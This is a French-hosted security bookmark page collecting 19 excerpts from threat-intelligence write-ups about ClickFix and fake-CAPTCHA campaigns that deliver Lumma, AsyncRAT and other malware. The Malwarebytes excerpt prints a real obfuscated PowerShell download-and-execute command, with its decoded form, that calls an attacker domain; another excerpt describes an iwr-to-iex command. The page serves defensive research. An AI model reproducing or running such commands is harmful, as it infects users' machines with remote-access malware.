Cyberveillecurated by Decio
Nuage de tags
Mur d'images
Quotidien
Flux RSS
  • Flux RSS
  • Daily Feed
  • Weekly Feed
  • Monthly Feed
Filtres

Liens par page

  • 20 links
  • 50 links
  • 100 links

Filtres

Untagged links
19 résultats taggé ClickFix  ✕
A Wretch Client: From ClickFix deception to information stealer deployment — Elastic Security Labs https://www.elastic.co/security-labs/a-wretch-client
18/06/2025 08:23:30
QRCode
archive.org
thumbnail

Elastic Security Labs has observed the ClickFix technique gaining popularity for multi-stage campaigns that deliver various malware through social engineering tactics.

Our threat intelligence indicates a substantial surge in activity leveraging ClickFix (technique first observed) as a primary initial access vector. This social engineering technique tricks users into copying and pasting malicious PowerShell that results in malware execution. Our telemetry has tracked its use since last year, including instances leading to the deployment of new versions of the GHOSTPULSE loader. This led to campaigns targeting a broad audience using malware and infostealers, such as LUMMA and ARECHCLIENT2, a family first observed in 2019 but now experiencing a significant surge in popularity.

This post examines a recent ClickFix campaign, providing an in-depth analysis of its components, the techniques employed, and the malware it ultimately delivers.

Key takeaways

  • ClickFix: Remains a highly effective and prevalent initial access method.
  • GHOSTPULSE: Continues to be widely used as a multi-stage payload loader, featuring ongoing development with new modules and improved evasion techniques. Notably, its initial configuration is delivered within an encrypted file.
  • ARECHCLIENT2 (SECTOPRAT): Has seen a considerable increase in malicious activity throughout 2025.
elastic.co EN 2025 ClickFix analysis GHOSTPULSE ARECHCLIENT2 (SECTOPRAT)
HuluCaptcha — An example of a FakeCaptcha framework https://gi7w0rm.medium.com/hulucaptcha-an-example-of-a-fakecaptcha-framework-9f50eeeb2e6d
04/06/2025 13:20:20
QRCode
archive.org

Hello and welcome back to another blog post. After some time of absence due to a lot of changes in my personal life ( finished university, started a new job, etc), I am happy to finally be able to present something new.

Chapter 1: Captcha-verified Victim
This story starts with a message by one of my long time internet contacts:

Figure 1: Shit hit the Fan
I assume, some of you can already tell from this message alone that something terrible had just happend to him.

The legitimate website of the German Association for International Law had redirected him to an apparent Cloudflare Captcha site asking him to execute a Powershell command on device that does a Webrequest (iwr = Invoke-WebRequest) to a remote website (amoliera[.]com) and then pipes the response into “iex” which stands for Invoke-Expression.

Thats a text-book example for a so called FakeCaptcha attack.

For those of you that do not know what the FakeCaptcha attack technique is, let me give you a short primer:

A Captcha in itself is a legitimate method Website Owners use to differentiate between bots (automated traffic) and real human users. It often involves at-least clicking a button but can additionally require the website visitor to solve different form of small tasks like clicking certain images out of a collection of random images or identifying a bunch of obscurely written letters. The goal is to only let users visit the website that are able to solve these tasks, which are often designed to be hard for computers but easy for human beings. Well, most of the times.

gi7w0rm medium 2025 EN HuluCaptcha FakeCaptcha framework ClickFix
Victims risk AsyncRAT infection after being redirected to fake Booking.com sites https://www.malwarebytes.com/blog/news/2025/06/victims-risk-asyncrat-infection-after-being-redirected-to-fake-booking-sites
04/06/2025 13:14:33
QRCode
archive.org
thumbnail

We found that cybercriminals are preparing for the impending holiday season with a redirect campaign leading to AsyncRAT.
Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media—and as sponsored ads—that lead to fake websites posing as Booking.com. According to Malwarebytes research, 40% of people book travel through a general online search, creating a lot of opportunities for scammers.

The first signs of the campaign showed up mid-May and the final redirect destination changes every two to three days.

Following the links brings visitors to a familiar strategy where fake CAPTCHA websites hijack your clipboard and try to trick visitors into infecting their own device.

fake Captcha
fake Captcha prompt
As usual on these websites, by putting a checkmark in the fake Captcha prompt you’re giving the website permission to copy something to your clipboard.

Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals.

instructions for the visitor
instructions to infect your own device
If you’re using Chrome, you may see this warning:

Chrome warns but for what?
Chrome issues a warning but it may the danger may be unclear to users
The warning is nice, but it’s not very clear what this warning is for, in my opinion.

Users of Malwarebytes’ Browser Guard will see this warning:

Browser Guard clipboard warning
Malwarebytes Browser Guard’s clipboard warning
“Hey, did you just copy something?

Heads up, your clipboard was just accessed from this website. Be sure you trust the owner before passing this someplace you don’t want it. Like a terminal or an email to your boss.”

Well, either way, don’t just discard these warnings. Even if you think you’re looking at an actual booking website, this is not the kind of instructions you’re expected to follow.

What the website just put on the clipboard may look like gobbledegook to some, though more experienced users will see the danger.

pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"

The cybercriminals used mixed casing, quote interruption, and variable name manipulation to hide their true intentions, but what it actually says (and does if you follow the instructions) is:

powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"

The malicious Captcha form tells the user to copy the content of the clipboard into the Windows Run dialog box and execute the instructions from the above command. When Browser Guard detects that the text copied to the clipboard contains this kind of potentially malicious command, it will add the phrase Suspicious Content at the front of the copied content which makes it an invalid command and the user will see a warning instead of having infected themselves.

Should a user fall for this without any protections enabled, the command will open a hidden powershell window to download and execute a file called ckjg.exe which in turn would download and execute a file called Stub.exe which is detected by Malwarebytes/ThreatDown as Backdoor.AsyncRAT.

Backdoor.AsyncRAT is a backdoor Trojan which serves as a Remote Access Tool (RAT) designed to remotely monitor and control other computers. In other words, it puts your device at the mercy of the person controlling the RAT.

The criminals can gather sensitive and financial information from infected devices which can lead to financial damages and even identity theft.

IOCs
The domains and subdomains we found associated with this campaign rotate quickly. From what I could retrace, they change the URL to the landing page every two to three days. But here is a list of recently active ones.

(booking.)chargesguestescenter[.]com

(booking.)badgustrewivers.com[.]com

(booking.)property-paids[.]com

(booking.)rewiewqproperty[.]com

(booking.)extranet-listing[.]com

(booking.)guestsalerts[.]com

(booking.)gustescharge[.]com

kvhandelregis[.]com

patheer-moreinfo[.]com

guestalerthelp[.]com

rewiewwselect[.]com

hekpaharma[.]com

bkngnet[.]com

partnervrft[.]com

malwarebytes EN ClickFix AsyncRAT Booking.com
Hackers now testing ClickFix attacks against Linux targets https://www.bleepingcomputer.com/news/security/hackers-now-testing-clickfix-attacks-against-linux-targets/
12/05/2025 23:38:46
QRCode
archive.org
thumbnail

A new campaign employing ClickFix attacks has been spotted targeting both Windows and Linux systems using instructions that make infections on either operating system possible.
A new campaign employing ClickFix attacks has been spotted targeting both Windows and Linux systems using instructions that make infections on either operating system possible.

ClickFix is a social engineering tactic where fake verification systems or application errors are used to trick website visitors into running console commands that install malware.

These attacks have traditionally targeted Windows systems, prompting targets to execute PowerShell scripts from the Windows Run command, resulting in info-stealer malware infections and even ransomware.

However, a 2024 campaign using bogus Google Meet errors also targeted macOS users.

ClickFix targeting Linux users
A more recent campaign spotted by Hunt.io researchers last week is among the first to adapt this social engineering technique for Linux systems.

The attack, which is attributed to the Pakistan-linked threat group APT36 (aka "Transparent Tribe"), utilizes a website that impersonates India's Ministry of Defence with a link to an allegedly official press release.

bleepingcomputer EN 2025 APT36 ClickFix Linux Social-Engineering
Evil Deno: Abusing the Nicest JavaScript Runtime: Taggart Tech https://taggart-tech.com/evildeno/
06/05/2025 20:04:14
QRCode
archive.org
thumbnail

I've been following the development of Deno for some time. It kind of pushes all my buttons: a Rust-based Node alternative with an active web developer community?? Yes please.

As a developer, I've been looking for excuses to use Deno because, frankly, it's so much fun. It makes JavaScript/TypeScript enjoyable again by shipping sane defaults and making delightful choices about dependency management.

Deno also has some truly incredible features that go beyond the web development ecosystem. I want to focus on these features. I've wanted to explore Deno from an offensive security perspective for some time, but a new development in version 2.3 made this imperative: deno.exe—the standalone binary that constitutes the entire tool—is now code-signed on Windows.

Great news for Deno! But because of what Deno can do, it's also good news for those who would do nefarious things with it.

Code signing is a guarantee that the binary you got is the one you're supposed to have. It's supposed to be a higher level of trust than simply a hash checksum, since this is Microsoft telling you a trusted developer shipped this program.

It also means (for now), that Defender SmartScreen gives deno.exe a pass.

So what can Deno do for the red team and the ne'er-do-wells? I've put together a small sampling of demonstrations of Deno's capabilities.

I'm focusing somewhat on the "ClickFix" attack vector, since it is so prevalent at the time of writing, and apparently so effective. So with each of these, I want you to imagine some version of a user opening Win+R and pasting a short command in.

taggart-tech.com EN 2025 Evil Deno Evil-Deno Rust-based Node Defender SmartScreen ClickFix
Threat actors misuse Node.js to deliver malware and other malicious payloads | Microsoft Security Blog https://www.microsoft.com/en-us/security/blog/2025/04/15/threat-actors-misuse-node-js-to-deliver-malware-and-other-malicious-payloads/?_bhlid=7cad219df2b33b89940e503424edaf8ccb6df9b1
20/04/2025 12:38:06
QRCode
archive.org
thumbnail

Since October 2024, Microsoft Defender Experts has observed and helped multiple customers address campaigns leveraging Node.js to deliver malware and other payloads that ultimately lead to information theft and data exfiltration.

microsoft EN 2025 Node.js malware ClickFix exfiltration analysis campaign
From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/
01/04/2025 11:54:41
QRCode
archive.org
thumbnail

Discover how Lazarus leverages fake job sites in the ClickFake Interview campaign targeting crypto firms using the ClickFix tactic.

sekoia EN 2025 ClickFake Interview ClickFix Lazarus
ClickFix: Another Deceptive Social Engineering Technique https://www.logpoint.com/en/blog/emerging-threats/clickfix-another-deceptive-social-engineering-technique/
31/03/2025 19:37:12
QRCode
archive.org
thumbnail

Discover ClickFix, a rising social engineering threat used to deliver malware and learn how to detect and respond against it with Logpoint.

logpoint EN 2025 ClickFix social-engineering Technique
Auto Dealership Supply Chain Attack https://rmceoin.github.io/malware-analysis/2025/03/13/supply-chain.html
24/03/2025 09:18:57
QRCode
archive.org

Over 100 auto dealerships were being abused compliments of a supply chain attack of a shared video service unique to dealerships. When active, the attack presented dealership visitors with a ClickFix webpage which led to a SectopRAT malware.

rmceoin EN 2025 Auto Dealership ClickFix SectopRAT analysis
Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware https://www.microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware/
23/03/2025 10:56:48
QRCode
archive.org
thumbnail

Starting in December 2024, leading up to some of the busiest travel days, Microsoft Threat Intelligence identified a phishing campaign that impersonates online travel agency Booking.com and targets organizations in the hospitality industry. The campaign uses a social engineering technique called ClickFix to deliver multiple credential-stealing malware in order to conduct financial fraud and theft. […]

microsoft EN 2025 microsoft Phishing campaign credential-stealing malware Booking.com ClickFix
ClickFix: The Social Engineering Technique Hackers Use to Manipulate Victims https://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/
13/03/2025 16:15:08
QRCode
archive.org

Discover how the ClickFix social engineering attack exploits human psychology to bypass security. Learn how hackers use this tactic and how to protect against it.

group-ib EN 2025 ClickFix Social Engineering Manipulation analysis
Havoc: SharePoint with Microsoft Graph API turns into FUD C2 https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2
04/03/2025 08:29:11
QRCode
archive.org

ForitGuard Lab reveals a modified Havoc deployed by a ClickFix phishing campaign. The threat actor hides each stage behind SharePoint and also uses it as a C2.

FortiGuard-Labs-Threat-Research EN 2025 C2-server ClickFix SharePoint campaign
WordPress ClickFix Malware Causes Google Warnings and Infected Computers https://blog.sucuri.net/2025/02/wordpress-clickfix-malware-causes-google-warnings-and-infected-computers.html
23/02/2025 21:00:41
QRCode
archive.org
thumbnail

Learn about the fake Google reCAPTCHA campaign infecting machines by tricking unsuspecting users into running malicious Powershell commands.

sucuri EN 2025 WordPress ClickFix Malware reCAPTCHA
Malicious ads push Lumma infostealer via fake CAPTCHA pages https://www.bleepingcomputer.com/news/security/malicious-ads-push-lumma-infostealer-via-fake-captcha-pages/
22/12/2024 20:47:10
QRCode
archive.org
thumbnail

A large-scale malvertising campaign distributed the Lumma Stealer info-stealing malware through fake CAPTCHA verification pages that prompt users to run PowerShell commands to verify they are not a bot.

bleepingcomputer EN 2024 Captcha ClickFix Information-Stealer Lumma Malvertising Malware PowerShell Security InfoSec Computer-Security
“DeceptionAds” — Fake Captcha Driving Infostealer Infections and a Glimpse to the Dark Side of Internet Advertising https://labs.guard.io/deceptionads-fake-captcha-driving-infostealer-infections-and-a-glimpse-to-the-dark-side-of-0c516f4dc0b6
16/12/2024 21:14:16
QRCode
archive.org

Guardio Labs tracked and analyzed a large-scale fake captcha campaign distributing a disastrous Lumma info-stealer malware that circumvents general security measures like Safe Browsing. Entirely reliant on a single ad network for propagation, this campaign showcases the core mechanisms of malvertising — delivering over 1 million daily “ad impressions” and causing thousands of daily victims to lose their accounts and money through a network of 3,000+ content sites funneling traffic. Our research dissects this campaign and provides insights into the malvertising industry’s infrastructure, tactics, and key players.

Through a detailed analysis of redirect chains, obfuscated scripts, and Traffic Distribution Systems (TDS) — in collaboration with our friends at Infoblox — we traced the campaign’s origins to Monetag, a part of ProepllerAds’ network previously tracked by Infoblox under the name “Vane Viper.” Further investigation reveals how threat actors leveraged services like BeMob ad-tracking to cloak their malicious intent, showcasing the fragmented accountability in the ad ecosystem. This lack of oversight leaves internet users vulnerable and enables malvertising campaigns to flourish at scale.

labs.guard.io EN 2024 LummaStealer ClickFix DeceptionAds Advertising
Threat Actors Push ClickFix Fake Browser Updates Using Stolen Credentials https://www.godaddy.com/resources/news/threat-actors-push-clickfix-fake-browser-updates-using-stolen-credentials
12/12/2024 12:02:49
QRCode
archive.org
thumbnail

ClickFix fake browser updates are being distributed by bogus WordPress plugins. Learn about the common indicators of compromise.

godaddy EN 2024 ClickFix Fake Browser Updates WordPress
ClickFix tactic: Revenge of detection https://blog.sekoia.io/clickfix-tactic-revenge-of-detection/
05/11/2024 14:27:46
QRCode
archive.org
thumbnail

Detect the ClickFix tactic: a social engineering technique using fake video calls and CAPTCHA pages to deploy malicious code.

sekoia EN 2024 ClickFix tactic
ClickFix tactic: The Phantom Meet https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/
30/10/2024 14:39:58
QRCode
archive.org
thumbnail

Analyse the ClickFix tactic and related campaigns. Uncover a ClickFix campaign impersonating Google Meet and cybercrime infrastructure.

sekoia EN 2024 ClickFix campaigns Google Meet
ClickFix Deception: A Social Engineering Tactic to Deploy Malware https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clickfix-deception-a-social-engineering-tactic-to-deploy-malware/
17/07/2024 10:29:10
QRCode
archive.org
thumbnail

Authored by Yashvi Shah and Vignesh Dhatchanamoorthy McAfee Labs has discovered a highly unusual method of malware delivery, referred to by researchers as

mcafee EN 2024 analysis ClickFix Deploy Malware Tactic
4481 links
Shaarli - The personal, minimalist, super-fast, database free, bookmarking service par la communauté Shaarli - Theme by kalvn - Curated by Decio